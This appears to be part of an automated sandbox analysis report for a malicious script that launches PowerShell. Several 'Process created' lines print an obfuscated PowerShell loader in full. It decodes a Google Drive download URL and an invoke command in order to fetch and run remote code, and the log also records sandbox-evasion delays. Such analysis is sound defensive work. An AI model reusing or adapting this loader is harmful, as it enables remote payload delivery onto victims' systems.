Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5088 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4716 Jump to behavior
Source: C:\Windows\System32\wscript.exe TID: 7044 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7296 Thread sleep time: -4611686018427385s >= -30000s Jump to behavior
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: wscript.exe, 00000000.00000003.1324862606.0000023177CE8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000000.00000002.1326400425.00000231779B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1322079424.0000023177A07000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1313931978.0000023177A07000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1314771216.0000023177990000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1314579860.0000023177A07000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1314816316.00000231779B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1326555258.0000023177A07000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000003.00000002.1477405694.00000245188C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Skraaningsvinklen = 1;$Fotografiapparaternes202='Substrin';$Fotografiapparaternes202+='g';Function Baroclinicity($Genforenende){$Piccoloerne=$Genforenende.Length-$Skraaningsvinklen;For($Vainness=5; $Vainness -lt $Piccoloerne; $Vainness+=(6)){$Flyttende+=$Genforenende.$Fotografiapparaternes202.Invoke($Vainness, $Skraaningsvinklen);}$Flyttende;}function parasols($Dugpunkts){. ($isskabes) ($Dugpunkts);}$Strandedness=Baroclinicity 'Age eMMicrooSyd,rzThermiToftmlS lenlMarp,a Mak /Relev5Samov.Blood0 fte Thol( efolW TeltiD arfnAnk.nd BagsoCampiwG,debsOmnip Fo laNBrndsTGgele Stikh1 S,ud0frang. Kond0Thoke;,aptu RumguWKoalii,arpenMongr6 Lu,s4 .nde;Sexua UnderxGejrp6Tou,n4 Midw;Dista MalmrVisitv,teto:Hykle1Dryad2 Hard1Cysto.Clupe0Prcis) boga LaborGEneboeChenicBureak Clemo Gang/Flgev2Sm.at0Dsles1 nnih0 Ribn0oxli,1 T.ag0Etape1 Otm emulFDataliHastur BliteMiscofOverboSalgsx ulph/ ,her1Decim2 Bero1A,ieh.Thras0Opstt ';$Budgetforslags=Baroclinicity 'VelseUBlurssBrnepeForlgrharmo-SaddeABefrugDeso,eSneglnQuatrtDilog ';$Programbibliotekerne=Baroclinicity 'InfamhBrygmt DisptFluespUlovmsTypeh: ,thi/Narco/Und rdRenour Hel,i skftv DetieFring.MaanegRverko orkaoPrincg femvlBrazie ,rof. Pro,cFlertoC,burm K ge/SekunuTska.cSekre? kriteUnstaxForedp Vando SealrInd.at dspa= Ranud TykmoStru w.lasknNa lsl HattoSu,ceaLibiddSmitt&HippoiVan hdAbsin=Infor1Ra koSH.ktiEb.lavG PruncDis iwK,lleB HanlcDeterOSpaliPTodiduIntr.C Bldg6BefliM,tipu5Subscv aturD AlimjPrimukAnnekN HandXRagiuiHovedP DraczSvingaRetrtZPa,ktoConcezmega.dConsiUStowbePrsen2 NdriwRaen. ';$Noninductively=Baroclinicity 'Ubeh.>C.rap ';$isskabes=Baroclinicity ' osoniTagryeB lstxCha,l ';$Leisjes = Baroclinicity 'sejtreFristc ,olihEndo,oYemel Steff%Anti.aMinicpSpindpSluggdResida SuivtSoundaDagce%Burkg\HemagCTalrkoW mbwl.otheoOvergusmrgarbaadfa Yamst nderiFoolsoAleu,n Call.Zool.AMerogfMapuchDonk, Belor&Welte&Uhlan EndeveTil.ucRustlhWebe.o Pred Post$Sagge ';parasols (Baroclinicity 'Victu$Skrpeg FrivlInduso Omstbeks.ma NeollBe.kn:LevelP,evier,llano,ivisgUnregrThundaAlumim,agfjmCytoseSkinnrRetu.iChiconWe,trgLo dosPreovm,sbryaH,ilkeEj rssEskilsColliiUnactgNedlu=Borto(Ud,mecRentemr,ckid Styr S,ati/georgc E.gy Overt$DispeLSweeteGesanihoneysAesirjFr,eseEqua,sSerr,)saliv ');parasols (Baroclinicity 'Engan$SpilugSordal .mmeoErhvebT appaDamp,l Part: ackhAD spivColumeF nden rettiTungnn B lr=Hachi$ Se uPErlggrLivero mpongRegiorTzotzaColismBenefbDvehjiOtolob BelclAlmeiiEk,troHylomt aadreFormokcentueInterr paanEulogeFavis.Rensks HullpIdeallUreteipraestAssor(Sol r$MalefNOmregoThomanViftei .robnMejetdSjagguIncorcEndowtCideriSolcrv Oak.e,oarrlHu.boy Tax,)De,in ');$Programbibliotekerne=$Avenin[0];parasols (Baroclinicity ' F,rh$Ergong u.tyl Eth oBlomkbSubdaaOparbl,lind:str kpSt,ndh PimpyCivillmun rlForgioSociam itniaCrocknAudi,cUne.cySquam=Pig oN koreeDra bwNarci- StowO UnspbBonitjYderpeSporec murktSwopc SignaSCed Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Colouration.Afh && echo $" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$skraaningsvinklen = 1;$fotografiapparaternes202='substrin';$fotografiapparaternes202+='g';function baroclinicity($genforenende){$piccoloerne=$genforenende.length-$skraaningsvinklen;for($vainness=5; $vainness -lt $piccoloerne; $vainness+=(6)){$flyttende+=$genforenende.$fotografiapparaternes202.invoke($vainness, $skraaningsvinklen);}$flyttende;}function parasols($dugpunkts){. ($isskabes) ($dugpunkts);}$strandedness=baroclinicity 'age emmicroosyd,rzthermitoftmls lenlmarp,a mak /relev5samov.blood0 fte thol( efolw teltid arfnank.nd bagsocampiwg,debsomnip fo lanbrndstggele stikh1 s,ud0frang. kond0thoke;,aptu rumguwkoalii,arpenmongr6 lu,s4 .nde;sexua underxgejrp6tou,n4 midw;dista malmrvisitv,teto:hykle1dryad2 hard1cysto.clupe0prcis) boga laborgeneboechenicbureak clemo gang/flgev2sm.at0dsles1 nnih0 ribn0oxli,1 t.ag0etape1 otm emulfdatalihastur blitemiscofoverbosalgsx ulph/ ,her1decim2 bero1a,ieh.thras0opstt ';$budgetforslags=baroclinicity 'velseublurssbrnepeforlgrharmo-saddeabefrugdeso,esneglnquatrtdilog ';$programbibliotekerne=baroclinicity 'infamhbrygmt disptfluespulovmstypeh: ,thi/narco/und rdrenour hel,i skftv detiefring.maanegrverko orkaoprincg femvlbrazie ,rof. pro,cflertoc,burm k ge/sekunutska.csekre? kriteunstaxforedp vando sealrind.at dspa= ranud tykmostru w.lasknna lsl hattosu,cealibiddsmitt&hippoivan hdabsin=infor1ra kosh.ktieb.lavg pruncdis iwk,lleb hanlcdeterospaliptodiduintr.c bldg6beflim,tipu5subscv aturd alimjprimukannekn handxragiuihovedp draczsvingaretrtzpa,ktoconcezmega.dconsiustowbeprsen2 ndriwraen. ';$noninductively=baroclinicity 'ubeh.>c.rap ';$isskabes=baroclinicity ' osonitagryeb lstxcha,l ';$leisjes = baroclinicity 'sejtrefristc ,olihendo,oyemel steff%anti.aminicpspindpsluggdresida suivtsoundadagce%burkg\hemagctalrkow mbwl.otheoovergusmrgarbaadfa yamst nderifoolsoaleu,n call.zool.amerogfmapuchdonk, belor&welte&uhlan endevetil.ucrustlhwebe.o pred post$sagge ';parasols (baroclinicity 'victu$skrpeg frivlinduso omstbeks.ma neollbe.kn:levelp,evier,llano,ivisgunregrthundaalumim,agfjmcytoseskinnrretu.ichiconwe,trglo dospreovm,sbryah,ilkeej rsseskilscolliiunactgnedlu=borto(ud,mecrentemr,ckid styr s,ati/georgc e.gy overt$dispelsweetegesanihoneysaesirjfr,eseequa,sserr,)saliv ');parasols (baroclinicity 'engan$spilugsordal .mmeoerhvebt appadamp,l part: ackhad spivcolumef nden rettitungnn b lr=hachi$ se uperlggrlivero mpongregiortzotzacolismbenefbdvehjiotolob belclalmeiiek,trohylomt aadreformokcentueinterr paaneulogefavis.rensks hullpideallureteipraestassor(sol r$malefnomregothomanviftei .robnmejetdsjagguincorcendowtciderisolcrv oak.e,oarrlhu.boy tax,)de,in ');$programbibliotekerne=$avenin[0];parasols (baroclinicity ' f,rh$ergong u.tyl eth oblomkbsubdaaoparbl,lind:str kpst,ndh pimpycivillmun rlforgiosociam itniacrocknaudi,cune.cysquam=pig on koreedra bwnarci- stowo unspbbonitjyderpesporec murktswopc signasced
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$skraaningsvinklen = 1;$fotografiapparaternes202='substrin';$fotografiapparaternes202+='g';function baroclinicity($genforenende){$piccoloerne=$genforenende.length-$skraaningsvinklen;for($vainness=5; $vainness -lt $piccoloerne; $vainness+=(6)){$flyttende+=$genforenende.$fotografiapparaternes202.invoke($vainness, $skraaningsvinklen);}$flyttende;}function parasols($dugpunkts){. ($isskabes) ($dugpunkts);}$strandedness=baroclinicity 'age emmicroosyd,rzthermitoftmls lenlmarp,a mak /relev5samov.blood0 fte thol( efolw teltid arfnank.nd bagsocampiwg,debsomnip fo lanbrndstggele stikh1 s,ud0frang. kond0thoke;,aptu rumguwkoalii,arpenmongr6 lu,s4 .nde;sexua underxgejrp6tou,n4 midw;dista malmrvisitv,teto:hykle1dryad2 hard1cysto.clupe0prcis) boga laborgeneboechenicbureak clemo gang/flgev2sm.at0dsles1 nnih0 ribn0oxli,1 t.ag0etape1 otm emulfdatalihastur blitemiscofoverbosalgsx ulph/ ,her1decim2 bero1a,ieh.thras0opstt ';$budgetforslags=baroclinicity 'velseublurssbrnepeforlgrharmo-saddeabefrugdeso,esneglnquatrtdilog ';$programbibliotekerne=baroclinicity 'infamhbrygmt disptfluespulovmstypeh: ,thi/narco/und rdrenour hel,i skftv detiefring.maanegrverko orkaoprincg femvlbrazie ,rof. pro,cflertoc,burm k ge/sekunutska.csekre? kriteunstaxforedp vando sealrind.at dspa= ranud tykmostru w.lasknna lsl hattosu,cealibiddsmitt&hippoivan hdabsin=infor1ra kosh.ktieb.lavg pruncdis iwk,lleb hanlcdeterospaliptodiduintr.c bldg6beflim,tipu5subscv aturd alimjprimukannekn handxragiuihovedp draczsvingaretrtzpa,ktoconcezmega.dconsiustowbeprsen2 ndriwraen. ';$noninductively=baroclinicity 'ubeh.>c.rap ';$isskabes=baroclinicity ' osonitagryeb lstxcha,l ';$leisjes = baroclinicity 'sejtrefristc ,olihendo,oyemel steff%anti.aminicpspindpsluggdresida suivtsoundadagce%burkg\hemagctalrkow mbwl.otheoovergusmrgarbaadfa yamst nderifoolsoaleu,n call.zool.amerogfmapuchdonk, belor&welte&uhlan endevetil.ucrustlhwebe.o pred post$sagge ';parasols (baroclinicity 'victu$skrpeg frivlinduso omstbeks.ma neollbe.kn:levelp,evier,llano,ivisgunregrthundaalumim,agfjmcytoseskinnrretu.ichiconwe,trglo dospreovm,sbryah,ilkeej rsseskilscolliiunactgnedlu=borto(ud,mecrentemr,ckid styr s,ati/georgc e.gy overt$dispelsweetegesanihoneysaesirjfr,eseequa,sserr,)saliv ');parasols (baroclinicity 'engan$spilugsordal .mmeoerhvebt appadamp,l part: ackhad spivcolumef nden rettitungnn b lr=hachi$ se uperlggrlivero mpongregiortzotzacolismbenefbdvehjiotolob belclalmeiiek,trohylomt aadreformokcentueinterr paaneulogefavis.rensks hullpideallureteipraestassor(sol r$malefnomregothomanviftei .robnmejetdsjagguincorcendowtciderisolcrv oak.e,oarrlhu.boy tax,)de,in ');$programbibliotekerne=$avenin[0];parasols (baroclinicity ' f,rh$ergong u.tyl eth oblomkbsubdaaoparbl,lind:str kpst,ndh pimpycivillmun rlforgiosociam itniacrocknaudi,cune.cysquam=pig on koreedra bwnarci- stowo unspbbonitjyderpesporec murktswopc signasced Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs